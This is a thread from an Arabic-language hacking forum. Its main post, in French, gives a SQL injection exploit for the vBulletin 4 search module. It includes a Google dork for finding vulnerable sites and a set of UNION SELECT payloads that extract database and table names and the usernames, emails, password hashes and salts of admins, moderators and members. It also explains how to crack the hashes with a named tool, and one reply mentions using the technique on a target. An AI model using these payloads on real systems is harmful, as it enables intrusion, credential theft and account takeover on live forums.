![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
|
Salutations,
je vous poste aujourd'hui la nouvelle faille découverte sur le puissant vBulletin. La vulnérabilité touche les versions 4 de vBulletin . dans le module de la recherche avancée l'exploitation de la faille ce fait grâce au cébèble plugin firefox (Live HTTP Headers) Google dork : inurl:”search.php?search_type=1? La faille nous permet d'avoir le username et le hash du mot de passe qu'on peux décrypter grâce au logiciel PasswordPro ([]) en utilisant l’algorithme md5(md5($pass).$salt). Requêtes utilisés pour l'extraction des idents : كود:
Affiche le nom de la BDD : &cat[0]=1) UNION SELECT database()# Affiche la liste des tables : &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# Affiche les informations du l'Administrateur suprême (User, passe hash, email, salt) : &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#< Affiche tout les admin : &cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6# Affiche tout les super modo : &cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=5# Affiche tout les modos : &cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=7# Affiche les membres normaux : &cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=2#
التعديل الأخير تم بواسطة ViRuS_Ra3cH ; 05/02/2012 الساعة 02:19 |
||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
| الأعضاء الذين قالوا شكراً لـ The UnKn0wN على المشاركة المفيدة: |
ViRuS_Ra3cH (05/02/2012)
|
|
|
المشاركة رقم: 2 | ||||||||||||
|
merci pour les explications |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
لا ادري لما اللغة الانجليزية لانو في شرح تم في الحماية للابد اضن شرحين بالعربية + استخدمناها في احد احد الاهداف |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
اسف لاني راح اتكلم عربي |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 24
|
|
| Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅ , ApOcalYpse , chevr0sky , clever , المجاهد الجزائري , Damane2011 , dr.kasper , Dr.VaMpIrE , dzkabyle , hacker-fire , Hackerz , Igor000rogI , mohamed7x , Mr.Thief , زيدو22 , pain96 , rhipla , snifferss , The UnKn0wN , ucfcool , virangar , ViRuS_Ra3cH , yabod1 , yasMouh |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| [ برنامج مجانى ] Tutorial Hiren's BootCD Norton Ghost | ADMINISTRATOR | [ منتدى البرامج الكاملة والمشروحة ] | 0 | 02/01/2012 15:24 |
| [webapps / 0day] - Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerabil | ADMINISTRATOR | قسم الثغرات | 0 | 21/07/2011 20:45 |
| [webapps / 0day] - vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability | ADMINISTRATOR | قسم الثغرات | 0 | 21/05/2011 12:30 |
| vBulletin™ Version 4.0.1 Remote SQL Injection Exploit | ViRuS_Ra3cH | [ منتدى حـقن قواعد البيانات | Sql injcetion ] | 5 | 07/09/2010 00:57 |
| MySQL injection tutorial | illuminat | [ منتدى حـقن قواعد البيانات | Sql injcetion ] | 3 | 30/07/2010 20:08 |
![]() |
![]() |
![]() |